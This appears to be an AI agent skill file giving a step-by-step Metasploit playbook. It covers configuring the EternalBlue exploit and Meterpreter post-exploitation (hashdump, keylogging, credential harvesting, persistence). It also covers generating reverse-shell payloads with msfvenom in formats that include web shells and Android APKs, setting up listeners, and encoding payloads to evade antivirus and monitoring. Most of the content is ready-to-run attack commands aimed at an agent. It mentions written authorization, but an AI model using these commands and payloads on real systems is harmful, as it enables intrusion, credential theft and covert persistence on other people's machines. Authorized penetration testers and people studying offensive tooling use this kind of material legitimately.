--- name: Metasploit Framework description: This skill should be used when the user asks to "use Metasploit for penetration testing", "exploit vulnerabilities with msfconsole", "create payloads with msfvenom", "perform post-exploitation", "use auxiliary modules for scanning", or "develop custom exploits". It provides comprehensive guidance for leveraging the Metasploit Framework in security assessments. --- # Metasploit Framework ## Purpose Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments. ## Prerequisites ### Required Tools ```bash # Metasploit comes pre-installed on Kali Linux # For other systems: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall chmod 755 msfinstall ./msfinstall # Start PostgreSQL for database support sudo systemctl start postgresql sudo msfdb init ``` ### Required Knowledge - Network and system fundamentals - Understanding of vulnerabilities and exploits - Basic programming concepts - Target enumeration techniques ### Required Access - Written authorization for testing - Network access to target systems - Understanding of scope and rules of engagement ## Outputs and Deliverables 1. **Exploitation Evidence** - Screenshots and logs of successful compromises 2. **Session Logs** - Command history and extracted data 3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references 4. **Post-Exploitation Artifacts** - Credentials, files, and system information ## Core Workflow ### Phase 1: MSFConsole Basics Launch and navigate the Metasploit console: ```bash # Start msfconsole msfconsole # Quiet mode (skip banner) msfconsole -q # Basic navigation commands msf6 > help # Show all commands msf6 > search [term] # Search modules msf6 > use [module] # Select module msf6 > info # Show module details msf6 > show options # Display required options msf6 > set [OPTION] [value] # Configure option msf6 > run / exploit # Execute module msf6 > back # Return to main console msf6 > exit # Exit msfconsole ``` ### Phase 2: Module Types Understand the different module categories: ```bash # 1. Exploit Modules - Target specific vulnerabilities msf6 > show exploits msf6 > use exploit/windows/smb/ms17_010_eternalblue # 2. Payload Modules - Code executed after exploitation msf6 > show payloads msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp # 3. Auxiliary Modules - Scanning, fuzzing, enumeration msf6 > show auxiliary msf6 > use auxiliary/scanner/smb/smb_version # 4. Post-Exploitation Modules - Actions after compromise msf6 > show post msf6 > use post/windows/gather/hashdump # 5. Encoders - Obfuscate payloads msf6 > show encoders msf6 > set ENCODER x86/shikata_ga_nai # 6. Nops - No-operation padding for buffer overflows msf6 > show nops # 7. Evasion - Bypass security controls msf6 > show evasion ``` ### Phase 3: Searching for Modules Find appropriate modules for targets: ```bash # Search by name msf6 > search eternalblue # Search by CVE msf6 > search cve:2017-0144 # Search by platform msf6 > search platform:windows type:exploit # Search by type and keyword msf6 > search type:auxiliary smb # Filter by rank (excellent, great, good, normal, average, low, manual) msf6 > search rank:excellent # Combined search msf6 > search type:exploit platform:linux apache # View search results columns: # Name, Disclosure Date, Rank, Check (if it can verify vulnerability), Description ``` ### Phase 4: Configuring Exploits Set up an exploit for execution: ```bash # Select exploit module msf6 > use exploit/windows/smb/ms17_010_eternalblue # View required options msf6 exploit(windows/smb/ms17_010_eternalblue) > show options # Set target host msf6 exploit(...) > set RHOSTS 192.168.1.100 # Set target port (if different from default) msf6 exploit(...) > set RPORT 445 # View compatible payloads msf6 exploit(...) > show payloads # Set payload msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp # Set local host for reverse connection msf6 exploit(...) > set LHOST 192.168.1.50 msf6 exploit(...) > set LPORT 4444 # View all options again to verify msf6 exploit(...) > show options # Check if target is vulnerable (if supported) msf6 exploit(...) > check # Execute exploit msf6 exploit(...) > exploit # or msf6 exploit(...) > run ``` ### Phase 5: Payload Types Select appropriate payload for the situation: ```bash # Singles - Self-contained, no staging windows/shell_reverse_tcp linux/x86/shell_bind_tcp # Stagers - Small payload that downloads larger stage windows/meterpreter/reverse_tcp linux/x86/meterpreter/bind_tcp # Stages - Downloaded by stager, provides full functionality # Meterpreter, VNC, shell # Payload naming convention: # [platform]/[architecture]/[payload_type]/[connection_type] # Examples: windows/x64/meterpreter/reverse_tcp linux/x86/shell/bind_tcp php/meterpreter/reverse_tcp java/meterpreter/reverse_https android/meterpreter/reverse_tcp ``` ### Phase 6: Meterpreter Session Work with Meterpreter post-exploitation: ```bash # After successful exploitation, you get Meterpreter prompt meterpreter > # System Information meterpreter > sysinfo meterpreter > getuid meterpreter > getpid # File System Operations meterpreter > pwd meterpreter > ls meterpreter > cd C:\\Users meterpreter > download file.txt /tmp/ meterpreter > upload /tmp/tool.exe C:\\ # Process Management meterpreter > ps meterpreter > migrate [PID] meterpreter > kill [PID] # Networking meterpreter > ipconfig meterpreter > netstat meterpreter > route meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1 # Privilege Escalation meterpreter > getsystem meterpreter > getprivs # Credential Harvesting meterpreter > hashdump meterpreter > run post/windows/gather/credentials/credential_collector # Screenshots and Keylogging meterpreter > screenshot meterpreter > keyscan_start meterpreter > keyscan_dump meterpreter > keyscan_stop # Shell Access meterpreter > shell C:\Windows\system32> whoami C:\Windows\system32> exit meterpreter > # Background Session meterpreter > background msf6 exploit(...) > sessions -l msf6 exploit(...) > sessions -i 1 ``` ### Phase 7: Auxiliary Modules Use auxiliary modules for reconnaissance: ```bash # SMB Version Scanner msf6 > use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(...) > run # Port Scanner msf6 > use auxiliary/scanner/portscan/tcp msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > set PORTS 1-1000 msf6 auxiliary(...) > run # SSH Version Scanner msf6 > use auxiliary/scanner/ssh/ssh_version msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24 msf6 auxiliary(...) > run # FTP Anonymous Login msf6 > use auxiliary/scanner/ftp/anonymous msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > run # HTTP Directory Scanner msf6 > use auxiliary/scanner/http/dir_scanner msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > run # Brute Force Modules msf6 > use auxiliary/scanner/ssh/ssh_login msf6 auxiliary(...) > set RHOSTS 192.168.1.100 msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt msf6 auxiliary(...) > run ``` ### Phase 8: Post-Exploitation Modules Run post modules on active sessions: ```bash # List sessions msf6 > sessions -l # Run post module on specific session msf6 > use post/windows/gather/hashdump msf6 post(windows/gather/hashdump) > set SESSION 1 msf6 post(...) > run # Or run directly from Meterpreter meterpreter > run post/windows/gather/hashdump # Common Post Modules # Credential Gathering post/windows/gather/credentials/credential_collector post/windows/gather/lsa_secrets post/windows/gather/cachedump post/multi/gather/ssh_creds # System Enumeration post/windows/gather/enum_applications post/windows/gather/enum_logged_on_users post/windows/gather/enum_shares post/linux/gather/enum_configs # Privilege Escalation post/windows/escalate/getsystem post/multi/recon/local_exploit_suggester # Persistence post/windows/manage/persistence_exe post/linux/manage/sshkey_persistence # Pivoting post/multi/manage/autoroute ``` ### Phase 9: Payload Generation with msfvenom Create standalone payloads: ```bash # Basic Windows reverse shell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe # Linux reverse shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php # Python reverse shell msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py # PowerShell payload msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1 # ASP web shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp # WAR file (Tomcat) msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war # Android APK msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk # Encoded payload (evade AV) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe # List available formats msfvenom --list formats # List available encoders msfvenom --list encoders ``` ### Phase 10: Setting Up Handlers Configure listener for incoming connections: ```bash # Manual handler setup msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.1.50 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > exploit -j # The -j flag runs as background job msf6 > jobs -l # When payload executes on target, session opens [*] Meterpreter session 1 opened # Interact with session msf6 > sessions -i 1 ``` ## Quick Reference ### Essential MSFConsole Commands | Command | Description | |---------|-------------| | `search [term]` | Search for modules | | `use [module]` | Select a module | | `info` | Display module information | | `show options` | Show configurable options | | `set [OPT] [val]` | Set option value | | `setg [OPT] [val]` | Set global option | | `run` / `exploit` | Execute module | | `check` | Verify target vulnerability | | `back` | Deselect module | | `sessions -l` | List active sessions | | `sessions -i [N]` | Interact with session | | `jobs -l` | List background jobs | | `db_nmap` | Run nmap with database | ### Meterpreter Essential Commands | Command | Description | |---------|-------------| | `sysinfo` | System information | | `getuid` | Current user | | `getsystem` | Attempt privilege escalation | | `hashdump` | Dump password hashes | | `shell` | Drop to system shell | | `upload/download` | File transfer | | `screenshot` | Capture screen | | `keyscan_start` | Start keylogger | | `migrate [PID]` | Move to another process | | `background` | Background session | | `portfwd` | Port forwarding | ### Common Exploit Modules ```bash # Windows exploit/windows/smb/ms17_010_eternalblue exploit/windows/smb/ms08_067_netapi exploit/windows/http/iis_webdav_upload_asp exploit/windows/local/bypassuac # Linux exploit/linux/ssh/sshexec exploit/linux/local/overlayfs_priv_esc exploit/multi/http/apache_mod_cgi_bash_env_exec # Web Applications exploit/multi/http/tomcat_mgr_upload exploit/unix/webapp/wp_admin_shell_upload exploit/multi/http/jenkins_script_console ``` ## Constraints and Limitations ### Legal Requirements - Only use on systems you own or have written authorization to test - Document all testing activities - Follow rules of engagement - Report all findings to appropriate parties ### Technical Limitations - Modern AV/EDR may detect Metasploit payloads - Some exploits require specific target configurations - Firewall rules may block reverse connections - Not all exploits work on all target versions ### Operational Security - Use encrypted channels (reverse_https) when possible - Clean up artifacts after testing - Avoid detection by monitoring systems - Limit post-exploitation to agreed scope ## Troubleshooting | Issue | Solutions | |-------|-----------| | Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` | | Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads | | Session dies immediately | Migrate to stable process; use stageless payload; check AV; use AutoRunScript | | Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates |